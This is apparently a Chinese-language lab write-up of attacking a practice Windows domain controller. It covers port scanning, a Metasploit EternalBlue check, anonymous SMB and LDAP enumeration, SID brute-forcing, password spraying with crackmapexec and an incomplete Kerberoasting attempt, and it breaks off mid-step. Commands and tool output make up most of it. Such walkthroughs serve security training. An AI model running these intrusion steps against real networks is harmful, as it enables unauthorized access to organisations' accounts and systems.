DC01
DC01
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali💀kali)-[~/temp/DC01]
└─$ nmap -Pn -sTCV -T4 $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 08:34 EDT
Nmap scan report for 192.168.10.102
Host is up (0.0020s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 03:40:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 15h05m49s
| smb2-time:
| date: 2024-08-11T03:40:34
|_ start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:94:55:97 (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.42 seconds
发现Domain: SOUPEDECODE.LOCAL0,域名解析一般都是小写,添加进dns
1
192.168.10.102 soupedecode.local
漏洞发现
敏感端口信息搜集
发现开了445端口,先看一下永恒之蓝能不能一把梭。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
┌──(kali💀kali)-[~/temp/DC01]
└─$ msfconsole -q
msf6 > search ms17
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882
28 auxiliary/admin/mssql/mssql_escalate_execute_as . normal No Microsoft SQL Server Escalate EXECUTE AS
29 auxiliary/admin/mssql/mssql_escalate_execute_as_sqli . normal No Microsoft SQL Server SQLi Escalate Execute AS
30 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
31 \_ target: Execute payload (x64) . . . .
32 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 32, use 32 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipe yes List of named pipes to check
s.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.10.102
RHOSTS => 192.168.10.102
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.10.102:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.10.102:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
看来不行,按部就班的搞吧。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbmap -H 192.168.10.102
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbmap -H 192.168.10.102 -u anonymous
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.10.102:445 Name: 192.168.10.102 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
使用默认用户anonymous发现有个IPC$可读,尝试进行读取:
1
2
3
4
5
6
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient //$IP/IPC$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_NO_SUCH_FILE listing \*
匿名用户没有权限。。。尝试看一下其他的,想到了上面的域名解析。不知道有没有用:
尝试进行信息搜集:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali💀kali)-[~/temp/DC01]
└─$ ldapsearch -x -H ldap://$IP -D '' -w '' -b "DC=soupedecode,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=soupedecode,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
似乎成功了,似乎又不行。。。先不加domain试试:
1
ldapsearch -x -H ldap://$IP -D '' -w '' -b '' -s base "(objectclass=user)"
-x: 使用简单绑定(simple bind)方法进行连接。这会禁用 STARTTLS 加密,如果 LDAP 服务器支持 STARTTLS,则-x参数将绕过它。-H: 指定 LDAP 服务器的位置。在这里$IP应该被替换为实际的 LDAP 服务器 IP 地址或者主机名。-D: 指定执行绑定操作时使用的 DN(Distinguished Name)。在这里使用了空字符串'',这意味着未指定任何特定的 DN 进行匿名绑定或使用默认的匿名 DN。-w: 指定执行绑定操作时使用的密码。同样地,这里使用了空字符串''表示没有密码。-b: 指定搜索的基本 DN,即搜索的起点。这里也使用了空字符串'',这意味着使用默认的基本 DN 或者尝试从根开始搜索。-s base: 指定搜索范围。base表示只返回基本 DN 对应的对象本身,而不是它的子对象。"(objectclass=user)": 这是 LDAP 搜索过滤器,表示只返回objectClass属性值为user的条目。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=user)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=L
OCAL
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
ation,DC=SOUPEDECODE,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 45084
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
dnsHostName: DC01.SOUPEDECODE.LOCAL
defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL
currentTime: 20240811041058.0Z
configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
同样发现了前面的那个域名标志,如果没有给的话,可以从这里下手!
使用 ldapsearch:
- 目的是从 LDAP 服务器中获取用户列表,包括用户名等信息。这可以通过匿名或已认证的方式进行。
- 通过 LDAP 查询,可以收集到用户的 DN(Distinguished Name),这是 LDAP 中用于唯一标识用户账户的字符串。
接下来尝试使用 lookupsid:
- 在获得了用户列表后,下一步可能是想要获取每个用户的 SID(Security Identifier)。这是因为某些操作,如文件权限检查或模拟登录等,可能需要使用 SID 而不是用户名。
- `lookupsid 可以通过用户的 DN 或用户名来查找相应的 SID。
https://github.com/fortra/impacket/blob/master/examples/lookupsid.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
┌──(kali💀kali)-[~/temp/DC01]
└─$ python3 lookupsid.py
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
usage: lookupsid.py [-h] [-ts] [-target-ip ip address] [-port [destination port]] [-domain-sids] [-hashes LMHASH:NTHASH] [-no-pass] [-k] target [maxRid]
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
maxRid max Rid to check (default 4000)
options:
-h, --help show this help message and exit
-ts Adds timestamp to every logging output
connection:
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server
-domain-sids Enumerate Domain SIDs (will likely forward requests to the DC)
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful when proxying through smbrelayx)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
┌──(kali💀kali)-[~/temp/DC01]
└─$ python3 lookupsid.py soupedecode.local/anonymous@$IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at 192.168.10.102
[*] StringBinding ncacn_np:192.168.10.102[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
513: SOUPEDECODE\Domain Users (SidTypeGroup)
514: SOUPEDECODE\Domain Guests (SidTypeGroup)
515: SOUPEDECODE\Domain Computers (SidTypeGroup)
516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
518: SOUPEDECODE\Schema Admins (SidTypeGroup)
519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
520: SOUPEDECODE\Group Policy Creator Owners (SidTypeGroup)
521: SOUPEDECODE\Read-only Domain Controllers (SidTypeGroup)
522: SOUPEDECODE\Cloneable Domain Controllers (SidTypeGroup)
..........
2154: SOUPEDECODE\PC-82$ (SidTypeUser)
2155: SOUPEDECODE\PC-83$ (SidTypeUser)
2156: SOUPEDECODE\PC-84$ (SidTypeUser)
2157: SOUPEDECODE\PC-85$ (SidTypeUser)
2158: SOUPEDECODE\PC-86$ (SidTypeUser)
2159: SOUPEDECODE\PC-87$ (SidTypeUser)
2160: SOUPEDECODE\PC-88$ (SidTypeUser)
2161: SOUPEDECODE\PC-89$ (SidTypeUser)
2162: SOUPEDECODE\PC-90$ (SidTypeUser)
2163: SOUPEDECODE\firewall_svc (SidTypeUser)
2164: SOUPEDECODE\backup_svc (SidTypeUser)
2165: SOUPEDECODE\web_svc (SidTypeUser)
2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
爆破smb服务
尝试取出对应字符,等下尝试爆破smb服务,先给他复制到一个文件夹中,然后尝试处理,在咨询完群主(牛逼plus.jpg)以后得到了几种方案:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# grep -P '(?<=\\)[^ ]+' -o
# cat dic|awk -F'[ \\\\]+' '{print $3}' 我强烈要求的,因为我写的是这种写错了,awk里面一个\要四个\用来转义
# cat dic|sed 's+\\+/+g'|awk -F'[ /]+' '{print $3}'
# 强化版,可能有一个或两个字符
# cat dic|awk -F'[(\\\\]+' '{print $2}
# cat dic|grep -P '(?<=\\)[^(]+(?= )'
┌──(kali💀kali)-[~/temp/DC01]
└─$ crackmapexec -h
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {smb,mssql,winrm,ldap,ftp,rdp,ssh} ...
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks
Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes
Exclusive release for Porchetta Industries users
https://porchetta.industries/
Version : 5.4.0
Codename: Indestructible G0thm0g
options:
-h, --help show this help message and exit
-t THREADS set how many concurrent threads to use (default: 100)
--timeout TIMEOUT max timeout in seconds of each thread (default: None)
--jitter INTERVAL sets a random delay between each connection (default: None)
--darrell give Darrell a hand
--verbose enable verbose output
protocols:
available protocols
{smb,mssql,winrm,ldap,ftp,rdp,ssh}
smb own stuff using SMB
mssql own stuff using MSSQL
winrm own stuff using WINRM
ldap own stuff using LDAP
ftp own stuff using FTP
rdp own stuff using RDP
ssh own stuff using SSH
┌──(kali💀kali)-[~/temp/DC01]
└─$ crackmapexec smb $IP -u temp -p temp
SMB 192.168.10.102 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise
好家伙,第一个就是,lets go!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbmap -H 192.168.10.102 -u Enterprise
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.10.102:445 Name: soupedecode.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
尝试看一下:
1
2
3
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient //192.168.10.102/$IPC -U Enterprise
Password for [WORKGROUP\Enterprise]:
没有东西,嘶,是我打错了,重新看一下!
1
2
3
4
5
6
7
8
9
10
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient //192.168.10.102/IPC$ -U Enterprise
Password for [WORKGROUP\Enterprise]:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> pwd
Current directory is \\192.168.10.102\IPC$\
还是不行,尝试,继续看一下别的用户,跑成功也不停,看看多少个成功的!为了降低爆破压力,先看看账号密码一样的!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali💀kali)-[~/temp/DC01]
└─$ crackmapexec smb $IP -u temp -p temp --continue-on-success --no-bruteforce | grep -v "FAILURE"
SMB 192.168.10.102 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Domain:Domain
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Domain:Domain
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Domain:Domain
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Domain:Domain
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Domain:Domain
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Cert:Cert
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Schema:Schema
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Group:Group
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Read-only:Read-only
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Cloneable:Cloneable
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Protected:Protected
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Key:Key
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\RAS:RAS
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Allowed:Allowed
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\Denied:Denied
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\DnsAdmins:DnsAdmins
SMB 192.168.10.102 445 DC01 [+] SOUPEDECODE.LOCAL\DnsUpdateProxy:DnsUpdateProxy
SMB 192.168.10.102 445 DC01 [-] SOUPEDECODE.LOCAL\ybob317:ybob317 STATUS_PASSWORD_EXPIRED
发现了一个认证过期的!瞅瞅!
1
2
3
4
┌──(kali💀kali)-[~/temp/DC01]
└─$ smbclient //192.168.10.102/IPC$ -U ybob317
Password for [WORKGROUP\ybob317]:
session setup failed: NT_STATUS_PASSWORD_EXPIRED
果然过期了,但是我们至少拿到了一个用户,接下来就该看看其他方面了。
Kerberoasting
之前扫描端口,看到一个票据认证的服务端口,尝试找相关工具扫一下!
1
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 03:40:33Z)
参考:https://book.hacktricks.xyz/network-services-pentesting/pentesting-kerberos-88
使用 https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali💀kali)-[~/temp/DC01]
└─$ python3 GetUserSPNs.py -h
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-no-preauth NO_PREAUTH] [-stealth] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE]
[-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]
target
Queries target domain for SPNs that are running under a user account
positional arguments:
target domain[/username[:password]]
options:
-h, --help show this help message and exit
-target-domain TARGET_DOMAIN
Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
-no-preauth NO_PREAUTH
account that does not require preauth, to obtain Service Ticket through the AS
-stealth Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. May cause huge memory consumption / errors on large domains.
-usersfile USERSFILE File with user per line to test
-request Requests TGS for users and output them in JtR/hashcat format (default False)
-request-user username
Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
-save Saves TGS requested to disk. Format is <username>.ccache. Auto selects -request
-outputfile OUTPUTFILE
Output filename to write ciphers in JtR/hashcat format. Auto selects -request
-ts Adds timestamp to every logging output.
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
┌──(kali💀kali)-[~/temp/DC01]
└─$ python3 GetUserSPNs.py -dc-ip $IP SOUPEDECODE.LOCAL/ybob317:ybob317 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c
然后我重新扫描了一下这个端口信息,发现时间不同步。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali💀kali)-[~/temp/DC01]
└─$ nmap -sCV -p 88 -Pn $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 12:03 EDT
Nmap scan report for soupedecode.local (192.168.10.102)
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:15:06Z)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.28 seconds
┌──(kali💀kali)-[~/temp/DC01]
└─$ date
Sat Aug 10 12:05:14 PM EDT 2024
需要同步时钟,尝试多个办法无果,只能使用别人的办法辣,下面是我尝试失败的例子:
1
2
3
4
5
6
